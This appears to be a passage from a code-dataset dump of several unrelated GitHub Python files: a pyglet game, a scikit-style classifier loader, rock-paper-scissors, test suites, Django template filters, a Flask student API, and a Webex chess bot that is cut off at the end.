and end,\n # the denser the fog in the fog range.\n glFogf(GL_FOG_START, 20.0)\n glFogf(GL_FOG_END, 60.0)\n\n\ndef main():\n window = Window( width=800, height=600, caption='Pyglet', resizable=True )\n # Hide the mouse cursor and prevent the mouse from leaving the window.\n window.set_exclusive_mouse(True)\n setup()\n pyglet.app.run()\n\nif __name__ == '__main__':\n main()\n","repo_name":"y-vas/game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"28627809120","text":"# |MODULES|--------------------------------------------------------------------\nimport sys\nimport os.path\nMODULE_PATH = os.path.dirname(__file__)\nimport pandas as pd\nimport pickle as pk\n\n\ndef assess(x):\n clf = pk.load(open(os.path.join(MODULE_PATH,'finalized_model.sav'), 'rb'))\n mean = pk.load(open(os.path.join(MODULE_PATH,'mean.sav'), 'rb'))\n var = pk.load(open(os.path.join(MODULE_PATH,'var.sav'), 'rb'))\n x = (x - mean)/var\n x = x.to_numpy().reshape(1, -1)\n return clf.predict(x)[0]\n\n\nif __name__ == \"__main__\":\n test = pd.read_csv('trainlist.csv')\n y = test.loc[:, \"Class\"].to_numpy()\n test = test.iloc[:, 1:-2]\n for i in range(test.shape[0]):\n #for j, val in enumerate(test.iloc[i].to_list()):\n # print(\"{}\\t{}\\n\".format(j, val))\n print(assess(test.iloc[i]))\n\n # clf = pk.load(open('finalized_model.sav', 'rb'))\n # mean = pk.load(open('mean.sav', 'rb'))\n # print(mean)\n # var = pk.load(open('var.sav', 'rb'))\n # print(var)\n # test = (test - mean)/var\n # test = test.to_numpy()\n\n # predict = clf.score(test, y)\n # print(predict)\n\n\n #print(assess(sample.reshape(1, -1)))\n #train = pd.read_csv('testlist.csv')\n #mean = train.iloc[:, 1:-2].mean(axis=0).to_list()\n #var = train.iloc[:, 1:-2].std(axis=0).to_list()\n #pk.dump(mean, open('mean.sav', 'wb'))\n #pk.dump(var, open('var.sav', 'wb'))\n #print(test)\n #print(mean)\n #print(var)\n\n sys.exit(0)\n","repo_name":"regisaiah/ECE-499---Classifier","sub_path":"mentalfatigue.py","file_name":"mentalfatigue.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15809668780","text":"\r\nimport random\r\n\r\nclass Game(): #class game with four methods\r\n \r\n def __init__(self):\r\n self.user_item = self.get_user_item()\r\n self.computer_item = self.get_computer_item()\r\n self.winner = self.get_game_result()\r\n \r\n @staticmethod\r\n def get_user_item(): #method to get user input\r\n \r\n user_item = input(\"Choose between (rock/paper/scissors) \\n\")\r\n first_choice= [\"rock\",\"paper\",\"scissors\"]\r\n \r\n for i in first_choice: # loop through the list of options\r\n \r\n if i == user_item:\r\n return user_item\r\n \r\n while user_item not in first_choice:\r\n user_item = input(\"Choose between (rock/paper/scissors) \\n\") \r\n @staticmethod\r\n def get_computer_item(): #method for computer choice\r\n \r\n second_choice = [\"rock\",\"paper\",\"scissors\"]\r\n computer = random.choice(second_choice)\r\n return computer\r\n \r\n def get_game_result(self): #method to display winner\r\n if self.user_item == \"rock\" and self.computer_item == \"paper\":\r\n return \"Computer\"\r\n if self.user_item == \"rock\" and self.computer_item == \"scissors\":\r\n return \"User \"\r\n if self.user_item == \"paper\" and self.computer_item == \"rock\":\r\n return \"User\"\r\n if self.user_item == \"scissors\" and self.computer_item == \"rock\":\r\n return \"Computer\"\r\n if self.user_item == \"rock\" and self.computer_item == \"rock\":\r\n return \"Draw\"\r\n if self.user_item == \"paper\" and self.computer_item == \"scissors\":\r\n return \"Computer\"\r\n if self.user_item == \"scissors\" and self.computer_item == \"paper\":\r\n return \"User\"\r\n if self.user_item == \"paper\" and self.computer_item == \"paper\":\r\n return \"Draw\"\r\n if self.user_item == \"scissors\" and self.computer_item == \"scissors\":\r\n return \"Draw\"\r\n \r\n def play(self): \r\n if self.winner == \"Draw\": \r\n print(f'user 1 selected {self.user_item} and computer selected {self.computer_item} There a tie')\r\n else:\r\n print(f'user 1 selected {self.user_item} and computer selected {self.computer_item} The winner is {self.winner}')\r\n \r\ntest = Game()\r\n\r\n\r\ntest.play()\r\n\r\n\r\n\r\n\r\n\r\n \r\n ","repo_name":"Mengawanji/Dev-Ins","sub_path":"Week 5/day 5/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30627662814","text":"from lxml import etree\nfrom pprint import pprint as pp\n\nfilename = \"CBS_COLBERT_{episode:04d}_CONTENT_CIAN_caption_{kind}.xml\"\nfilepath = \"data/\" + filename\n\nfor i in range(1, 20):\n path = filepath.format(kind=\"DFXP\", episode=i)\n\n tree = etree.parse(path)\n root = tree.getroot()\n\n ns_mapping = {'ns':'http://www.w3.org/ns/ttml'}\n full_text = \" \".join([ptext for ptext in root.xpath('//ns:tt/ns:body/ns:div/ns:p//text()', namespaces=ns_mapping)])\n\n pp(full_text.split(\">>\"))","repo_name":"tsizzle/the-late-show-with-stephen-colbert-analysis","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13948933731","text":"def print2largest(arr, arr_size):\n if (arr_size < 2):\n print(\" Invalid Input \");\n return\n largest = second = -2454635434;\n for i in range(0, arr_size):\n largest = max(largest, arr[i]);\n for i in range(0, arr_size):\n if (arr[i] != largest):\n second = max(second, arr[i])\n \n if (second == -2454635434):\n print(\"There is no second \" +\n \"largest element\")\n else:\n print(\"The second largest \" +\n \"element is \\n\", second)\n \narr = list(map(int,input().split()))\nn = len(arr)\nprint2largest(arr, n)\n","repo_name":"Arshadfaizan/aps-codelibrary","sub_path":"SecondLargest.py","file_name":"SecondLargest.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"3609397043","text":"# from mock import patch\nimport datetime\nfrom mock import patch\nfrom tests import BaseCase\nfrom api import mining_api\n\nBDAY_TUPLE = (1982, 9, 2, 16, 30, 0) # yay my birthday\n\n\nclass MiningTestsBase(BaseCase):\n pass\n\n\n# Association RuleSet Tests\n'''\nclass QueryRuleSetEntitiesTests(MiningTestsBase):\n \"\"\"\n Tests around querying for Association RulesSets\n \"\"\"\n def setUp(self):\n super(QueryRuleSetEntitiesTests, self).setUp()\n\n m2 = mining_api.AssociationRuleModel(['Cheese:1', 'Peanut Butter:0'],\n ['Steak:1'],\n .25)\n\n mining_api.create_rules('ruleset_id', [m1, m2])\n\n def test_no_params(self):\n raise Exception('not yet')\n result = mining_api._query_rule_entities()\n\n self.assertEqual(len(result), 2)\n self.assertTrue(isinstance(result[0], mining_api.AssociationRuleEntity))\n self.assertTrue(isinstance(result[1], mining_api.AssociationRuleEntity))\n'''\n\n\nclass CreateRulesetTests(MiningTestsBase):\n\n @patch('api.mining_api.get_resource_id_from_key', return_value='mocked_id')\n def test_base(self, m_get_id):\n result = mining_api.create_ruleset(.4, .7)\n\n self.assertTrue(isinstance(result, mining_api.AssociationRuleSetModel))\n self.assertEqual(result.min_confidence, .7)\n self.assertEqual(result.min_support, .4)\n self.assertEqual(result.total_rules, None)\n self.assertTrue(isinstance(result.created_timestamp, datetime.datetime))\n self.assertEqual(result.id, 'mocked_id')\n\n# Association Rule Tests\n\n\nclass RuleModelTests(MiningTestsBase):\n def test_get_rule_item_id(self):\n \"\"\"\n Ensure we can generate a composite pref id for use in txn lists\n representing item and if the session user liked it or not.\n \"\"\"\n\n rule_model = mining_api.AssociationRuleModel(['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'],\n ['Cheese:0'],\n .25)\n\n self.assertEqual(rule_model.generate_rule_key(), 'peanut_butter:0__peanut_butter:1__steak:0')\n\n\nclass QueryRuleEntitiesTests(MiningTestsBase):\n \"\"\"\n Tests around querying for Association Rules\n \"\"\"\n def setUp(self):\n super(QueryRuleEntitiesTests, self).setUp()\n\n m1 = mining_api.AssociationRuleModel(['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'],\n ['Cheese:0'],\n .25)\n m2 = mining_api.AssociationRuleModel(['Cheese:1', 'Peanut Butter:0'],\n ['Steak:1'],\n .25)\n\n mining_api.create_rules('ruleset_id', [m1, m2])\n\n def test_no_params(self):\n result, cursor, more = mining_api._query_rule_entities()\n\n self.assertEqual(len(result), 2)\n self.assertTrue(isinstance(result[0], mining_api.AssociationRuleEntity))\n self.assertTrue(isinstance(result[1], mining_api.AssociationRuleEntity))\n\n\nclass QueryRuleModelsTests(MiningTestsBase):\n @patch('api.mining_api._query_rule_entities')\n @patch('api.mining_api._populate_rule_model')\n def test_base(self, mock_populate, mock_query):\n # Setup Mocks\n mock_query.return_value = (['a', 'b'], None, False)\n\n # Run Code To Test\n result = mining_api.query_rule_models(limit=4, kwarg=True)\n\n # Check results\n self.assertEqual(result, ([mock_populate.return_value, mock_populate.return_value], None, False))\n mock_query.assert_called_once_with(limit=4, kwarg=True)\n\n\n@patch('api.mining_api.get_resource_id_from_key', return_value='mocked_id')\nclass CreateRuleTest(MiningTestsBase):\n \"\"\"Tests around creating a single AssociationRuleModel\"\"\"\n\n def test_base(self, m_get_id):\n ant = ['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0']\n con = ['Cheese:0']\n\n m = mining_api.AssociationRuleModel(ant, con, .85)\n result = mining_api.create_rule('ruleset_id', m)\n\n self.assertTrue(isinstance(result, mining_api.AssociationRuleModel))\n self.assertEqual(result.ant, ['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'])\n self.assertEqual(result.con, ['Cheese:0'])\n self.assertEqual(result.confidence, .85)\n self.assertEqual(result.rule_key, 'peanut_butter:0__peanut_butter:1__steak:0')\n self.assertEqual(result.id, 'mocked_id')\n self.assertEqual(result.ruleset_id, 'ruleset_id')\n\n\n@patch('api.mining_api.get_resource_id_from_key', return_value='mocked_id')\nclass CreateMultiTest(MiningTestsBase):\n \"\"\"Tests around creating multiple AssociationRuleModel at once\"\"\"\n def test_base(self, m_get_id):\n ant = ['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0']\n con = ['Cheese:0']\n\n m1 = mining_api.AssociationRuleModel(ant, con, .85)\n m2 = mining_api.AssociationRuleModel(ant, con, .85)\n result = mining_api.create_rules('ruleset_id', [m1, m2])\n\n self.assertTrue(isinstance(result, list))\n\n self.assertTrue(isinstance(result[0], mining_api.AssociationRuleModel))\n self.assertEqual(result[0].ant, ant)\n self.assertEqual(result[0].con, con)\n self.assertEqual(result[0].confidence, .85)\n self.assertEqual(result[0].rule_key, 'peanut_butter:0__peanut_butter:1__steak:0')\n self.assertEquals(result[0].id, 'mocked_id')\n self.assertEqual(result[0].ruleset_id, 'ruleset_id')\n\n self.assertEqual(m_get_id.call_count, 2)\n\n\nclass DeleteRulesTests(MiningTestsBase):\n def setUp(self):\n super(DeleteRulesTests, self).setUp()\n\n m1 = mining_api.AssociationRuleModel(['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'],\n ['Cheese:0'],\n .25)\n mining_api.create_rules('ruleset_id', [m1])\n\n def base_test(self):\n\n self.assertEqual(1, len(mining_api.query_rule_models()[0]))\n mining_api.delete_rules()\n self.assertEqual(0, len(mining_api.query_rule_models()[0]))\n\n\"\"\"\n\nclass DeleteRulesSinceTests(MiningTestsBase):\n def base_test(self):\n result = mining_api.delete_rules_since()\n\"\"\"\n\n\n\"\"\"\n\nclass RunAprioriTests(MiningTestsBase):\n def base_test(self):\n result = mining_api.run_apriori()\n\"\"\"\n\"\"\"\n\nclass PrintItemsAndRulesTests(MiningTestsBase):\n def base_test(self):\n result = mining_api._print_items_and_rules()\n\n\"\"\"\n\"\"\"\n\nclass PopulateEntityTests(MiningTestsBase):\n def base_test(self):\n result = mining_api._populate_entity()\n\"\"\"\n","repo_name":"divrods/pref-service","sub_path":"tests/api_tests/mining_api_tests.py","file_name":"mining_api_tests.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70883098972","text":"import calendar\nimport datetime\nimport math\n\nfrom collections import defaultdict\n\nfrom django import template\nfrom django.core.paginator import Paginator, EmptyPage\nfrom django.db.models.query import QuerySet\nfrom django.utils.safestring import mark_safe\nfrom django.template import defaultfilters\n\nfrom synnefo.lib.ordereddict import OrderedDict\nfrom synnefo.util import units\n\nfrom astakos.im import settings\nfrom astakos.im.models import ProjectResourceGrant, Project\nfrom astakos.im.views import util as views_util\nfrom astakos.im import util\nfrom astakos.im import presentation\nfrom astakos.im.models import AstakosUser\n\nfrom astakos.im import quotas\n\nregister = template.Library()\n\nDELIM = ','\n\n\ndef _is_inf(value):\n try:\n return value == units.PRACTICALLY_INFINITE\n except:\n return False\n\n\n@register.filter\ndef monthssince(joined_date):\n now = datetime.datetime.now()\n date = datetime.datetime(\n year=joined_date.year, month=joined_date.month, day=1)\n months = []\n\n month = date.month\n year = date.year\n timestamp = calendar.timegm(date.utctimetuple())\n\n while date < now:\n months.append((year, month, timestamp))\n\n if date.month < 12:\n month = date.month + 1\n year = date.year\n else:\n month = 1\n year = date.year + 1\n\n date = datetime.datetime(year=year, month=month, day=1)\n timestamp = calendar.timegm(date.utctimetuple())\n\n return months\n\n\n@register.filter\ndef to_unicode(s):\n return unicode(s)\n\n\n@register.filter\ndef to_string(s):\n return str(s)\n\n\n@register.filter\ndef lookup(d, key):\n try:\n return d.get(key)\n except:\n return\n\n\n@register.filter\ndef lookup_uni(d, key):\n return d.get(unicode(key))\n\n\n@register.filter\ndef dkeys(d):\n return d.keys()\n\n\n@register.filter\ndef month_name(month_number):\n return calendar.month_name[month_number]\n\n\n@register.filter\ndef todate(value, arg=''):\n secs = int(value) / 1000\n return datetime.datetime.fromtimestamp(secs)\n\n\n# @register.filter\n# def rcut(value, chars='/'):\n# return value.rstrip(chars)\n\n\n@register.filter\ndef paginate(l, args):\n l = l or []\n page, delim, sorting = args.partition(DELIM)\n if sorting:\n if isinstance(l, QuerySet):\n l = l.order_by(sorting)\n elif isinstance(l, list):\n default = ''\n if sorting.endswith('_date'):\n default = datetime.datetime.utcfromtimestamp(0)\n l.sort(key=lambda i: getattr(i, sorting)\n if getattr(i, sorting) else default)\n paginator = Paginator(l, settings.PAGINATE_BY)\n try:\n paginator.len\n except AttributeError:\n paginator._count = len(list(l))\n\n try:\n page_number = int(page)\n except ValueError:\n if page == 'last':\n page_number = paginator.num_pages\n else:\n page_number = 1\n try:\n page = paginator.page(page_number)\n except EmptyPage:\n page = paginator.page(1)\n return page\n\n\n@register.filter\ndef concat(str1, str2):\n if not str2:\n return str(str1)\n return '%s%s%s' % (str1, DELIM, str2)\n\n\n@register.filter\ndef items(d):\n if isinstance(d, defaultdict):\n return d.iteritems()\n return d\n\n\n@register.filter\ndef get_value_after_dot(value):\n return value.split(\".\")[1]\n\n# @register.filter\n# def strip_http(value):\n# return value.replace('http://','')[:-1]\n\n\n@register.filter\ndef truncatename(v, max=18, append=\"...\"):\n util.truncatename(v, max, append)\n\n\n@register.filter\ndef selected_resource_groups(project_or_app):\n if not project_or_app:\n return []\n\n grants = project_or_app.resource_set\n resources = grants.values_list('resource__name', flat=True)\n return map(lambda r: r.split(\".\")[0], resources)\n\n\n@register.filter\ndef resource_grants(project_or_app):\n try:\n grants = project_or_app.resource_set\n grants = grants.values_list(\n 'resource__name', 'member_capacity', 'project_capacity')\n return dict((e[0], {'member':e[1], 'project':e[2]}) for e in grants)\n except:\n return {}\n\n\ndef get_resource_grant(project_or_app, rname, capacity_for):\n if project_or_app is None:\n return None\n\n resource_set = project_or_app.resource_set\n if not resource_set.filter(resource__name=rname).count():\n return None\n\n resource = resource_set.get(resource__name=rname)\n return getattr(resource, '%s_capacity' % capacity_for)\n\n\n@register.filter\ndef get_member_resource_grant_value(project_or_app, rname):\n return get_resource_grant(project_or_app, rname, \"member\")\n\n\n@register.filter\ndef get_project_resource_grant_value(project_or_app, rname):\n return get_resource_grant(project_or_app, rname, \"project\")\n\n\n@register.filter\ndef resource_diff(r, member_or_project):\n if not hasattr(r, 'display_project_diff'):\n return ''\n\n project, member = r.display_project_diff()\n diff = dict(zip(['project', 'member'],\n r.display_project_diff())).get(member_or_project)\n\n diff_disp = ''\n if diff != '':\n diff_disp = \"(%s)\" % diff\n tpl = '%s '\n cls = 'red' if diff.startswith(\"-\") else 'green'\n return mark_safe(tpl % (cls, diff_disp))\n\n\n@register.filter\ndef sorted_resources(resources_set):\n return views_util.sorted_resources(resources_set)\n\n\n@register.filter\ndef display_resource_usage_for_project(resource, project):\n usage_map = presentation.USAGE_TAG_MAP\n quota = quotas.get_project_quota(project).get(resource.name, None)\n\n if not quota:\n return \"No usage\"\n\n cls = ''\n usage = quota['project_usage']\n limit = quota['project_limit']\n\n if limit == 0 and usage == 0:\n return \"--\"\n\n usage_perc = \"%d\" % ((float(usage) / limit) * 100) if limit else \"100\"\n _keys = usage_map.keys()\n _keys.reverse()\n closest = filter(lambda x: int(x) <= int(usage_perc), _keys)[0]\n cls = usage_map[closest]\n\n usage_display = units.show(usage, resource.unit)\n usage_perc_display = \"%s%%\" % usage_perc\n\n resp = \"\"\"%s (%s) \"\"\" % \\\n (cls, usage_perc_display, usage_display)\n return mark_safe(resp)\n\n\n@register.filter\ndef is_pending_app(app):\n if not app:\n return False\n return app.state in [app.PENDING]\n\n\n@register.filter\ndef is_denied_app(app):\n if not app:\n return False\n return app.state in [app.DENIED]\n\n\ndef _member_policy_formatter(form_or_app, value, changed, mapping):\n if changed:\n changed = defaultfilters.title(mapping.get(changed))\n value = defaultfilters.title(mapping.get(value))\n return value, changed, None, None\n\n\ndef _owner_formatter(form_or_app, value, changed):\n if not changed:\n changed_name = None\n else:\n changed_name = changed.realname\n return value.realname if value else None, changed_name, None, None\n\n\ndef _owner_admin_formatter(form_or_app, value, changed):\n if not changed:\n changed_name = None\n else:\n changed_name = changed.realname + \" (%s)\" % changed.email\n return value.realname + \" (%s)\" % value.email if value else None, changed_name, None, None\n\n\ndef _owner_owner_formatter(form_or_app, value, changed):\n if not changed:\n changed_name = None\n else:\n changed_name = changed.realname\n return \"Me\", changed_name, None, None\n\n\nMODIFICATION_FORMATTERS = {\n 'member_policy': _member_policy_formatter,\n 'owner': _owner_formatter,\n 'owner_admin': _owner_admin_formatter,\n 'owner_owner': _owner_owner_formatter\n}\n\n\n@register.filter\ndef display_modification_param(form_or_app, param, formatter=None):\n formatter_name = None\n if \",\" in param:\n param, formatter_name = param.split(\",\", 1)\n\n project_attr = param\n\n if hasattr(form_or_app, 'instance'):\n # form\n project = Project.objects.get(pk=form_or_app.instance.pk)\n app_value = form_or_app.cleaned_data[param]\n project_value = getattr(project, project_attr)\n else:\n # app\n project = form_or_app.chain\n app_value = getattr(form_or_app, project_attr)\n project_value = getattr(project, project_attr)\n if app_value == None:\n app_value = project_value\n\n formatter_params = {}\n\n if param == \"member_join_policy\":\n formatter_name = 'member_policy'\n formatter_params = {'mapping':\n presentation.PROJECT_MEMBER_JOIN_POLICIES}\n\n if param == \"member_leave_policy\":\n formatter_name = 'member_policy'\n formatter_params = {'mapping':\n presentation.PROJECT_MEMBER_LEAVE_POLICIES}\n\n changed = False\n changed_cls = \"gray details\"\n if project_value != app_value:\n changed = project_value\n\n if not formatter and formatter_name:\n formatter = MODIFICATION_FORMATTERS.get(formatter_name)\n\n changed_prefix = \"current: \"\n if formatter:\n app_value, changed, cls, prefix = formatter(form_or_app,\n app_value, changed,\n **formatter_params)\n if cls:\n changed_cls = cls\n\n if prefix:\n changed_prefix = prefix\n\n tpl = \"\"\"%(value)s\"\"\"\n if changed:\n tpl += \"\"\"\"\"\" + \\\n \"\"\"%(changed_prefix)s%(changed)s \"\"\"\n\n if not app_value:\n app_value = \"(not set)\"\n\n return mark_safe(tpl % {\n 'value': app_value,\n 'changed': changed,\n 'changed_cls': changed_cls,\n 'changed_prefix': changed_prefix\n })\n\n\n@register.filter\ndef display_modification_param_diff(form_or_app, param):\n def formatter(form_or_app, value, changed):\n if changed in [None, False]:\n if _is_inf(value):\n value = \"Unlimited\"\n return value, changed, None, \" \"\n\n to_inf = _is_inf(value)\n from_inf = _is_inf(changed)\n\n diff = value - changed\n sign = \"+\"\n cls = \"green\"\n if diff < 0:\n sign = \"-\"\n diff = abs(diff)\n cls = \"red\"\n\n if diff != 5:\n if from_inf or to_inf:\n if from_inf:\n changed = \"Unlimited\"\n diff = \"from %s\" % changed\n else:\n diff = sign + str(diff)\n changed = \"(%s)\" % (diff,)\n else:\n changed = None\n\n if to_inf:\n value = \"Unlimited\"\n return value, changed, cls, \" \"\n\n return display_modification_param(form_or_app, param, formatter)\n\n\n@register.filter\ndef display_date_modification_param(form_or_app, params):\n param, date_format = params.split(\",\", 1)\n\n def formatter(form_or_app, value, changed):\n if changed not in [None, False]:\n changed = defaultfilters.date(changed, date_format)\n formatted_value = defaultfilters.date(value, date_format)\n return formatted_value, changed, None, None\n\n return display_modification_param(form_or_app, param, formatter)\n\n\n@register.filter\ndef inf_display(value):\n if value == units.PRACTICALLY_INFINITE:\n return 'Unlimited'\n return value\n\n\n@register.filter\ndef inf_value_display(value):\n if value == units.PRACTICALLY_INFINITE:\n return 'Unlimited'\n return value\n\n\n@register.filter\ndef project_name_for_user(project, user):\n return project.display_name_for_user(user)\n\n\n@register.filter\ndef owner_by_uuid(uuid):\n try:\n user = AstakosUser.objects.get(uuid=uuid)\n return \"%s %s (%s)\" % (user.first_name, user.last_name, user.email)\n except AstakosUser.DoesNotExist:\n return uuid\n\n\n@register.filter\ndef format_inf(value):\n if _is_inf(value):\n return \"Unlimited\"\n return value\n","repo_name":"grnet/synnefo","sub_path":"snf-astakos-app/astakos/im/templatetags/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":11861,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"32"}
+{"seq_id":"15243743884","text":"\"\"\"\n@filename : Student.py\n@description : Student 테이블 Controller 구현 \n@author : 천준홍 (cj562270@gmail.com)\n\"\"\"\nfrom flask import request\nfrom flask_restful import Resource\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models.Students import Student as studentModel\nimport json\nfrom utils.Util import replace_quotes\nfrom utils.Util import get_now_string\n\ndb = SQLAlchemy()\n\n# JSON 페이지를 담당하는 클래스\nclass Student(Resource):\n def get(self):\n # 조회 결과를 저장할 빈 변수\n rs = None\n name = request.args.get('name')\n pk = request.args.get('pk')\n\n # 문제 3번(검색어 목록 조회)\n if(pk == None):\n if(name == None):\n name = ''\n search = \"%{}%\".format(name)\n try:\n # like를 이용하여 파라미터가 포함된 이름을 찾고 원하는 컬럼만 select\n rs = studentModel.query.filter(studentModel.name.like(search)).with_entities(studentModel.name, studentModel.grade, studentModel.deptno, studentModel.userid).all()\n except Exception as e:\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n \n # select 결과를 json으로 내보내기 위해 dictionary로 변환\n dic = []\n for i,v in enumerate(rs):\n dic.append({'name': v[0] ,'grade' : v[1] ,'deptno': v[2] ,'userid': v[3]})\n \n return {'rt': 'OK', 'item': dic, 'pubDate': get_now_string()}\n\n # 문제 4번 (pk 파라미터 입력 상세조회)\n else:\n try:\n rs = studentModel.query.filter(studentModel.studno == pk).all()\n # query 오류시 메세지 출력\n except Exception as e:\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n \n # 존재하지 않는 pk값을 입력했을떄 오류메세지 출력\n if (len(rs) == 0):\n return '해당 pk값을 데이터베이스에서 찾을 수 없습니다.'\n dic = rs[0].to_dict()\n\n return {'rt': 'OK', 'item': dic, 'pubDate': get_now_string()}\n\n # 문제 5\n def post(self):\n # 저장할 값을 post 파라미터로 수신\n name = request.form.get('name')\n userid = request.form.get('userid')\n grade = request.form.get('grade')\n idnum = request.form.get('idnum')\n birthdate = request.form.get('birthdate')\n tel = request.form.get('tel')\n height = request.form.get('height')\n weight = request.form.get('weight')\n deptno = request.form.get('deptno')\n profno = request.form.get('profno')\n \n # 수신된 값을 model 객체로 묶는다.\n item = studentModel(name=name, userid=userid,grade=grade, idnum=idnum, birthdate=birthdate, tel=tel, height=height, weight=weight, deptno=deptno, profno=profno)\n \n try:\n # 저장 (insert)\n db.session.add(item)\n # 변경사항 반영\n db.session.commit()\n except Exception as e:\n # 에러가 났다면 변경사항 되돌리기\n db.session.rollback()\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n \n return {'rt': 'OK', 'pubDate': get_now_string()}, 200\n \n # 문제 6\n def put(self):\n studno = request.form.get('studno')\n name = request.form.get('name')\n userid = request.form.get('userid')\n grade = request.form.get('grade')\n idnum = request.form.get('idnum')\n birthdate = request.form.get('birthdate')\n tel = request.form.get('tel')\n height = request.form.get('height')\n weight = request.form.get('weight')\n deptno = request.form.get('deptno')\n profno = request.form.get('profno')\n \n # 입력받은 파라미터만 dictionary로 구성(원하는 파라미터만 변경하기 위함)\n param_list = [name, userid, grade, idnum, birthdate, tel, height, weight, deptno, profno]\n param_str = ['name','userid','grade','idnum','birthdate','tel','height','weight','deptno','profno']\n dic = {}\n for i,v in enumerate(param_list):\n if (v == None):\n continue\n dic[param_str[i]] = v\n\n # 존재하지 않는 studno(pk) 값 입력시 에러메세지 출력\n try:\n rs = studentModel.query.filter(studentModel.studno == studno).all()\n except Exception as e:\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n if (len(rs) == 0):\n return '해당 pk값을 데이터베이스에서 찾을 수 없습니다.'\n\n # 생성한 dictionary를 이용��여 update수행\n try:\n db.session.query(studentModel).filter(studentModel.studno==studno).update(dic)\n db.session.commit()\n # 에러 처리\n except Exception as e:\n db.session.rollback()\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n \n return {'rt': 'OK', 'pubDate': get_now_string()}, 200\n \n # 문제 7\n def delete(self):\n studno = request.form.get('studno')\n \n # 존재하지 않는 studno(pk)를 입력시 에러메세지 출력\n try:\n rs = studentModel.query.filter(studentModel.studno == studno).all()\n except Exception as e:\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n if (len(rs) == 0):\n return '해당 pk값을 데이터베이스에서 찾을 수 없습니다.'\n\n # pk값을 기준으로 delete수행\n try:\n db.session.query(studentModel).filter(studentModel.studno==studno).delete()\n db.session.commit()\n # 에러 처리\n except Exception as e:\n db.session.rollback()\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n \n return {'rt': 'OK', 'pubDate': get_now_string()}, 200","repo_name":"junhong-CHEON/flask_study","sub_path":"210830-flask문제/controllers/Students.py","file_name":"Students.py","file_ext":"py","file_size_in_byte":6148,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29221874273","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nfor _ in range(int(input())):\r\n W = input().rstrip()\r\n left, right = [], []\r\n \r\n for s in W:\r\n # <1. 커서를 왼쪽으로 옮기는 경우>\r\n if s == '<' and left:\r\n right.append(left.pop())\r\n # <2. 커서를 오른쪽으로 옮기는 경우> \r\n elif s == '>' and right:\r\n left.append(right.pop())\r\n # <3. 제거하는 경우> \r\n elif s == '-' and left:\r\n left.pop()\r\n # <4. 추가하는 경우> \r\n elif s.isalnum():\r\n left.append(s)\r\n \r\n left.extend(reversed(right)) \r\n print(''.join(left))","repo_name":"bbbang105/BaekjoonPrac","sub_path":"백준/Silver/5397. 키로거/키로거.py","file_name":"키로거.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"17839405407","text":"from flask import Flask, request\nimport json\nfrom webexteamssdk import WebexTeamsAPI, Webhook\nimport parser\nfrom helpers import (read_yaml_data,\n get_ngrok_url,\n find_webhook_by_name,\n delete_webhook, create_webhook)\n\nfrom conf import access_token\n\nflask_app = Flask(__name__)\nteams_api = None\n\n@flask_app.route('/teamswebhook', methods=['POST'])\ndef teamswebhook():\n \"\"\"\n Handle \n \"\"\"\n print(\"\\n\" + str(request.method) + \" received\\n\")\n print(request.json)\n\n json_data = request.json\n webhook_obj = Webhook(json_data)\n room = teams_api.rooms.get(webhook_obj.data.roomId)\n message = teams_api.messages.get(webhook_obj.data.id)\n\n # Don't respond to yourself\n if message.personId == teams_api.people.me().id:\n return 'OK'\n else:\n teams_api.messages.create(room.id, text=chess_response)\n person = teams_api.people.get(message.personId)\n \n with open('players.json') as f:\n player_json = f.read()\n\n try:\n board_dest = json.loads(player_json)[0][person]['active']\n except(Exception) as e:\n board_dest = \"board.bd\"\n board_dict = json.loads(player_json)[0]\n board_dict[person]['active'] = board_dest\n with open('players.json', 'w') as f:\n json.dump(board_dict, f)\n \n\n board = parser.Board(dest=board_dest)\n chess_response = parser.parse(board, message)\n\nif __name__ == '__main__':\n\n teams_api = WebexTeamsAPI(access_token=access_token)\n ngrok_url = get_ngrok_url()\n\n webhook_name = 'hello-bot-wb-hook'\n dev_webhook = find_webhook_by_name(teams_api, webhook_name)\n if dev_webhook:\n delete_webhook(teams_api, dev_webhook)\n create_webhook(teams_api, webhook_name, ngrok_url + '/teamswebhook')\n\n flask_app.run(host='0.0.0.0', 